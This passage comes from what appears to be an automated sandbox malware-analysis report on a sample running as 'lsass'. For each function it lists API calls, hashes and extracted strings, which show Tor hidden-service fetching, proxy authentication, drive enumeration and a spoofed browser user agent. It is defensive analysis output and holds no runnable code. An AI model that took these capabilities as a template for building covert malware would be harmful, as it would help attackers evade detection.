              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: memmove$AllocHeap$CryptEncryptSleep
              • String ID: F$V
              • API String ID: 3676980526-4172692743
              • Opcode ID: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
              • Instruction ID: bd07a51ac9aeae4c95e17463f371a833c9c63272a723bb4b12ce7be23e161ac8
              • Opcode Fuzzy Hash: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
              • Instruction Fuzzy Hash: B7514FB2D00209ABDF04DBD4DC86FEFB779AF58300F048518F519A7242E779AA15CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • lstrlenA.KERNEL32(?,00000000), ref: 007777A9
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlenmemmove
              • String ID: HTTP/1.0 %s$HTTP/1.0 200 OK$HTTP/1.0 403 Forbidden$HTTP/1.0 404 Not Found$HTTP/1.0 500 Internal Server Error$HTTP/1.0 502 Bad Gateway$HTTP/1.0 504 Gateway Timeout
              • API String ID: 4100021496-2506370377
              • Opcode ID: 4bcc6986c26109381dae8e01a0bb8ca6e972aaa685dcb8a641ad5a4ef54f6b0c
              • Instruction ID: 9e3e1a371ba081adfd35451062718b50eb68f3b1acabedd81f82e0d2d02177c8
              • Opcode Fuzzy Hash: 4bcc6986c26109381dae8e01a0bb8ca6e972aaa685dcb8a641ad5a4ef54f6b0c
              • Instruction Fuzzy Hash: 8A419EB4948358EADF28DB50DC41FEDB774AB08344F44C0D9E90DA6282E7B41B88CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: memmove$htons$htonl
              • String ID:
              • API String ID: 2070112683-0
              • Opcode ID: 72ff0c1ad30a6827b633005abfa44909f99d5b8abc6157dba166dfed7b51870a
              • Instruction ID: 58d83abf63cbb310048093e54a7aa6094b1fe640fed48b574feaa954cdb38bf0
              • Opcode Fuzzy Hash: 72ff0c1ad30a6827b633005abfa44909f99d5b8abc6157dba166dfed7b51870a
              • Instruction Fuzzy Hash: 9CD1FC70E0818A9BDF05CB94C5949FEB7F2AF81345F28C1A9D4996B242C2795F80DB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlentask
              • String ID: %s %s %s$%s %s %s$(Tx$0Tx$8Tx$://
              • API String ID: 773520081-1192421161
              • Opcode ID: cf9933944a0cca9db747485c938f10193f210b206a2346c4e8ae9158f6893fab
              • Instruction ID: 3cee96d494b4aa7226619cca1fa2263a6a7a7f4d24c3ed9b427585d690577ad5
              • Opcode Fuzzy Hash: cf9933944a0cca9db747485c938f10193f210b206a2346c4e8ae9158f6893fab
              • Instruction Fuzzy Hash: DF918D70A442289BDF28DF64CC84BEE77B5BF44344F14C098F609A6286D779AE84CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
              • shutdown.WS2_32(?,00000001), ref: 0077C78B
              • shutdown.WS2_32(?,?), ref: 0077C7B8
              • shutdown.WS2_32(?,00000002), ref: 0077C7F2
              • shutdown.WS2_32(?,00000002), ref: 0077C804
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: shutdown$CriticalEnterSection
              • String ID: 502 Bad Gateway$CONNECT
              • API String ID: 2480472672-1541487254
              • Opcode ID: 979582eeb1fdbf1c58aab178e8431c204b264d991d329f00960611ca3b3e2ca1
              • Instruction ID: fa772429bb639e4b3a01d6ed7d65b0068dbf503fa1e006afa0fec77a43ef7d61
              • Opcode Fuzzy Hash: 979582eeb1fdbf1c58aab178e8431c204b264d991d329f00960611ca3b3e2ca1
              • Instruction Fuzzy Hash: 8D719470B00245ABDF09DB61C895BBE7B71BF45395F08C0ACE9899B2C3CB399A41CB51
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLogicalDrives.KERNEL32 ref: 00780876
              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 007808C4
              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 007808F1
              • RegCloseKey.ADVAPI32(?), ref: 0078090E
              Strings
              • NoDrives, xrefs: 007808E8
              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 007808B7
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CloseDrivesLogicalOpenQueryValue
              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
              • API String ID: 2666887985-3471754645
              • Opcode ID: 8c002fc3c56b29415636ff08d1ab0b494452840da5a620107cc4af18fc90f216
              • Instruction ID: bfd49cbea6acb6d7debc3fa236d49ea1d5384b56c58eef40202aca4bf572fa58
              • Opcode Fuzzy Hash: 8c002fc3c56b29415636ff08d1ab0b494452840da5a620107cc4af18fc90f216
              • Instruction Fuzzy Hash: DA11F9B1E8020AABEB10DFD1D949BEEB7B4BB48304F208048E511A7281D3BC6A45CFD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00780387
              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007803A6
              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 007803CF
              • InternetCloseHandle.WININET(00000000), ref: 007803F8
              • InternetCloseHandle.WININET(00000000), ref: 00780402
              Strings
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 00780382
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Internet$CloseHandleOpen$HttpInfoQuery
              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
              • API String ID: 3871184103-255850170
              • Opcode ID: 262df9da936e7b725e72acc09487b8ef33d955efc2603c09c419137017e67070
              • Instruction ID: f5a8affd2a91eb0786b892ac13bfd5c3d2bf1ab30384f6a45811da02dd9deda8
              • Opcode Fuzzy Hash: 262df9da936e7b725e72acc09487b8ef33d955efc2603c09c419137017e67070
              • Instruction Fuzzy Hash: 3B111CB5A80248FFDB10DFA4CC49F9EB7B5BB04700F208558EA117B2C0C7B96A44CB55
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrlenA.KERNEL32(00000000), ref: 00773FD3
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: %hu$://$http=$https=$socks=
              • API String ID: 1659193697-336120641
              • Opcode ID: e51c70dab7a59d4e40eab501cd9d8ea77fd41ec402ed644ba37fbd1b9d6c2cec
              • Instruction ID: e4732a042846f8c3987246f106f4e6b04bc11229ea53f86973c23832ba89e417
              • Opcode Fuzzy Hash: e51c70dab7a59d4e40eab501cd9d8ea77fd41ec402ed644ba37fbd1b9d6c2cec
              • Instruction Fuzzy Hash: 4C919074A00259DFDF14CF94CC88BAEBBB5BF48344F24C498E549AB241DB799A84CF94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrlenA.KERNEL32(-00000104), ref: 007747C6
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • lstrlenA.KERNEL32(00000000), ref: 007748E7
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlen$memmove
              • String ID: Kerberos $NTLM $Negotiate $Proxy-Authorization: %s %s
              • API String ID: 1832346882-695359478
              • Opcode ID: 0c1e2efa78649710a5355bd10566014c4e21a851eb088d06fa74d17ac96d2c1b
              • Instruction ID: 93a1f7741ff27bc46cc879193822500fb7b317134826a49a6140c9a0f73299a3
              • Opcode Fuzzy Hash: 0c1e2efa78649710a5355bd10566014c4e21a851eb088d06fa74d17ac96d2c1b
              • Instruction Fuzzy Hash: 4A716FB5A00249AFDF04DF94D885FEEB7B5AF48344F14C058EA19AB381D774AA11CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00778FD0: closesocket.WS2_32(00000000), ref: 00778FE7
                • Part of subcall function 00778FD0: WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,0077E987,00000000,00000000,00000000), ref: 00778FF9
                • Part of subcall function 00778FD0: TerminateThread.KERNEL32(00000000,00000000,?,0077E987,00000000,00000000,00000000), ref: 00779008
                • Part of subcall function 00778FD0: CloseHandle.KERNEL32(00000000,?,0077E987,00000000,00000000,00000000), ref: 00779014
              • Sleep.KERNEL32(000007D0,00000000,00000001,00000001,00000000), ref: 0077EA59
              • CloseHandle.KERNEL32(?), ref: 0077EA70
              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000061A8), ref: 0077EA91
              • TerminateThread.KERNEL32(?,00000000), ref: 0077EAC7
              • CloseHandle.KERNEL32(?), ref: 0077EADB
              • WSACleanup.WS2_32 ref: 0077EB0E
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CloseHandle$TerminateThreadWait$CleanupMultipleObjectObjectsSingleSleepclosesocket
              • String ID:
              • API String ID: 3883441888-0
              • Opcode ID: 0c05a9d36579b09e18bc5f88a3be12c9be5454392c1b14e4b83da661148137cd
              • Instruction ID: 218a44e5025fdccebfc8a74ec44bcbb5faba55a0956db5134ca59c944424cc4c
              • Opcode Fuzzy Hash: 0c05a9d36579b09e18bc5f88a3be12c9be5454392c1b14e4b83da661148137cd
              • Instruction Fuzzy Hash: 53316F74A40304FBDB04DBA4DC59F9DBB71BF48305F148184F605AB3C2D6796A809BA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00773B80: GetTickCount.KERNEL32 ref: 00773B86
              • htonl.WS2_32(?), ref: 0077D387
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
              • memcmp.MSVCRT ref: 0077D4AC
              • memmove.MSVCRT ref: 0077D520
              Strings
              • GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s, xrefs: 0077D5B4
              • P, xrefs: 0077D417
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
              • String ID: GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s$P
              • API String ID: 495902089-332776292
              • Opcode ID: ab3e5c484bb37ca5e00a1eb2b9226361a4a84bf992d1dcf5bf1a7c5f93570d11
              • Instruction ID: 5f0445c6250dbdc6621bf37177a751938f2d1e3d10d8cfd74ddce2ebbe247c03
              • Opcode Fuzzy Hash: ab3e5c484bb37ca5e00a1eb2b9226361a4a84bf992d1dcf5bf1a7c5f93570d11
              • Instruction Fuzzy Hash: 3DB18FB490011A9BDF28DB94CC95BFEB7B5BF44384F0481A9E50DA7282E7789E84CF51
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • inet_ntop.WS2_32(00000002,?,?,00000400), ref: 00777DBD
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: inet_ntopmemmove
              • String ID: -----END RSA PUBLIC KEY-----$http://%s:%hu/tor/server/fp/%s.z$onion-key$router %s %s
              • API String ID: 1410992348-1243584039
              • Opcode ID: dd3ed1b9c7a687134ce8011eac7242aa8e98686d039c7a9f97e321d34d37bc4f
              • Instruction ID: 164b74e1aa711ef40d41b88eff175aa6304155813c0889d88a5d85404788f32f
              • Opcode Fuzzy Hash: dd3ed1b9c7a687134ce8011eac7242aa8e98686d039c7a9f97e321d34d37bc4f
              • Instruction Fuzzy Hash: D8818271A442189BDF28CB54CC85FE9B375BB54304F04C1E9F60DAA282DB785B85CF91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: memmove$CompletionPostQueuedStatus
              • String ID: @
              • API String ID: 2107774671-2766056989
              • Opcode ID: d82875b98f2d0fe3efe3b878edac6d67f5013f63b3843ce635feb4b2fb05996c
              • Instruction ID: 3501b3f925acfd123ae806e9ede0a6e093fde66073d59ec82fcb3bc8f3162df7
              • Opcode Fuzzy Hash: d82875b98f2d0fe3efe3b878edac6d67f5013f63b3843ce635feb4b2fb05996c
              • Instruction Fuzzy Hash: 05816074B00119ABDF2ADF11DC95AA9B7B9AF54344F00C4E9E50D5B381DA3A9F84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSAStartup.WS2_32(00000202,?), ref: 0077E7C9
                • Part of subcall function 007735B0: GetProcessHeap.KERNEL32(?,0077E7DC), ref: 007735B3
              • WSACleanup.WS2_32 ref: 0077E9FF
                • Part of subcall function 00773C60: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00773D9B
                • Part of subcall function 00772120: memmove.MSVCRT ref: 00772194
                • Part of subcall function 00772120: CryptAcquireContextA.ADVAPI32(0078A014,00000000,?,0000000D,F0000000), ref: 007721DE
                • Part of subcall function 00772120: CryptAcquireContextA.ADVAPI32(0078A11C,00000000,?,00000018,F0000000), ref: 007721FA
                • Part of subcall function 00772120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00772223
                • Part of subcall function 00772120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0077223C
              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0077E80F
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
                • Part of subcall function 00778E30: socket.WS2_32(00000002,00000001,00000006), ref: 00778E40
                • Part of subcall function 00778E30: setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 00778E73
                • Part of subcall function 00778E30: htons.WS2_32(00000000), ref: 00778E8C
                • Part of subcall function 00778E30: htonl.WS2_32(7F000001), ref: 00778EA4
                • Part of subcall function 00778E30: bind.WS2_32(00000000,?,00000010), ref: 00778EB9
                • Part of subcall function 00778E30: listen.WS2_32(00000000,00000064), ref: 00778ED0
                • Part of subcall function 00778E30: getsockname.WS2_32(00000000,?,00000010), ref: 00778EF4
                • Part of subcall function 00778E30: htons.WS2_32(?), ref: 00778F2D
                • Part of subcall function 00778E30: htons.WS2_32(?), ref: 00778F56
              • CloseHandle.KERNEL32(?,00000000,00000000,00000000), ref: 0077E9CE
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: ContextCrypt$htons$AcquireReleaseTime$CleanupCloseCompletionCreateCriticalEnterFileHandleHeapPortProcessSectionStartupSystembindgetsocknamehtonllistenmemmovesetsockoptsocket
              • String ID: ;w
              • API String ID: 3177777191-3485967011
              • Opcode ID: 9e60a67fcfa57326e1126258034404f29d46d954e5d15909207620c113846efb
              • Instruction ID: b614d64ae5140515db74c834e48d69abe8e223cf2ec58441e73fa9389775f58a
              • Opcode Fuzzy Hash: 9e60a67fcfa57326e1126258034404f29d46d954e5d15909207620c113846efb
              • Instruction Fuzzy Hash: 0051B170B012249FEF259B10CC19BBA7371BF4A344F5480D8E68D6A2C2D639AD80CF62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: ??2@codecvt
              • String ID: Y>x
              • API String ID: 664657501-2201431646
              • Opcode ID: 065869228e974dca3ab494a2f127eabe108657c77ddd5af2b8c0bceb42cbba63
              • Instruction ID: 3739b7e7a360ac9212c208dfaacea189dac12c3fa3890054b2ecec718a33aaed
              • Opcode Fuzzy Hash: 065869228e974dca3ab494a2f127eabe108657c77ddd5af2b8c0bceb42cbba63
              • Instruction Fuzzy Hash: CA415274D48308EFEF15DF54E8897AEBBB0BB08344F24C4AAD405662A0D77D1985CF66
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00773B80: GetTickCount.KERNEL32 ref: 00773B86
              • htonl.WS2_32(?), ref: 0077D387
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
              • memcmp.MSVCRT ref: 0077D4AC
              • memmove.MSVCRT ref: 0077D520
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
              • String ID: P
              • API String ID: 495902089-3110715001
              • Opcode ID: ad710f0f45a22a5124e29d6ee0cb703184a1d92143f2b582ab599f22e4068f59
              • Instruction ID: 1fb4df3b875b998e047873390c73d1bf71692532fcfd93eb57ad7a5a87ff548b
              • Opcode Fuzzy Hash: ad710f0f45a22a5124e29d6ee0cb703184a1d92143f2b582ab599f22e4068f59
              • Instruction Fuzzy Hash: F05192B4D0051ADBDF18EB94CC95BFEB776BF54344F0480A8E109A7282E7789E448F51
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: _longjmpmemmove
              • String ID: yuw$yuw
              • API String ID: 3772547588-483977393
              • Opcode ID: 91b4bc676493575068107c725abba6cce09b1457c8cbea3666a5a2e6da6e24b5
              • Instruction ID: be3d7a94631bb69a768e266d6107a030dbaf727ded32223b1fe05745ef600fbc
              • Opcode Fuzzy Hash: 91b4bc676493575068107c725abba6cce09b1457c8cbea3666a5a2e6da6e24b5
              • Instruction Fuzzy Hash: 38314275D0418A9FCF08CFA8C891EFFBBB6AF45344F08C059E85867341D674AA14CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetDriveTypeW.KERNEL32(007807CF), ref: 007807FD
              • QueryDosDeviceW.KERNEL32(007807CF,?,00000208), ref: 0078083C
              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00780854
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: DeviceDriveQueryType
              • String ID: \??\
              • API String ID: 1681518211-3047946824
              • Opcode ID: 5d6d84cc36a31d16b7c239f1d86ddff0fd0806ecf650209c904cee2fde705aaa
              • Instruction ID: 2a6d806577c24d49c73c119ade051b6d5d69dd77381765ede494861da8b95569
              • Opcode Fuzzy Hash: 5d6d84cc36a31d16b7c239f1d86ddff0fd0806ecf650209c904cee2fde705aaa
